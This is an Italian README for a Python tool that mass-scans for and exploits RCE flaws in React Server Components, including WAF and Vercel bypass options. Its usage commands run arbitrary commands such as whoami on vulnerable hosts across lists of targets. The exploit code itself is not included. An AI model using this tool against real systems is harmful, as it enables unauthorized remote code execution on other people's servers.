
PoC per la caccia di massa e lo sfruttamento di CVE-2025-55182 e CVE-2025-66478
Uno scanner e strumento di exploit potente e multi-thread per le vulnerabilità dei React Server Component (RSC). Questo strumento è progettato per identificare e sfruttare vulnerabilità RCE nelle implementazioni RSC, supportando varie tecniche e strategie di bypass.
Nota: Data l'enorme complessità di mantenere una shell interattiva completa e altre funzionalità pesanti, abbiamo deciso di rimuoverle. Questo progetto ora si concentra strettamente sulla gestione dei casi limite, sull'analisi comportamentale e sul rilevamento affidabile delle vulnerabilità RSC. Crediamo che uno strumento più semplice e più mirato serva meglio la comunità.
pip install requests
Scansiona un singolo URL per verificare la presenza di vulnerabilità.
python3 rschunter.py -u https://example.com
Scansiona un elenco di URL da un file (un URL per riga).
python3 rschunter.py -l targets.txt
Esegue un comando specifico sui target vulnerabili (il default è id).
python3 rschunter.py -u https://example.com -c "whoami"
Salva l'elenco degli host vulnerabili in un file CSV.
python3 rschunter.py -l targets.txt --save vulnerable.csv
Abilita l'iniezione di dati spazzatura per bypassare i WAF.
python3 rschunter.py -u https://example.com --waf-bypass
Abilita la strategia di bypass specifica per Vercel.
python3 rschunter.py -u https://example.com --vercel
Instrada il traffico attraverso un proxy (utile per il debug con Burp Suite).
python3 rschunter.py -u https://example.com --proxy http://127.0.0.1:8080
Questo strumento è destinato esclusivamente a scopi educativi e a test autorizzati. L'utilizzo di questo strumento per attaccare target senza previo consenso reciproco è illegale. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili per qualsiasi uso improprio o danno causato da questo programma.
| Argomento | Descrizione |
|---|
-u, --url | URL del target da scansionare. |
-l, --list | Percorso di un file contenente un elenco di target. |
-c, --cmd | Comando da eseguire (default: id). |
-t, --threads | Numero di thread concorrenti (default: 10). |
--check | Modalità sicura: verifica la presenza di vulnerabilità senza eseguire comandi personalizzati. |
--waf-bypass-size | Dimensione dei dati spazzatura in KB (default: 128). |
-v, --verbose | Abilita l'output verboso per il debug. |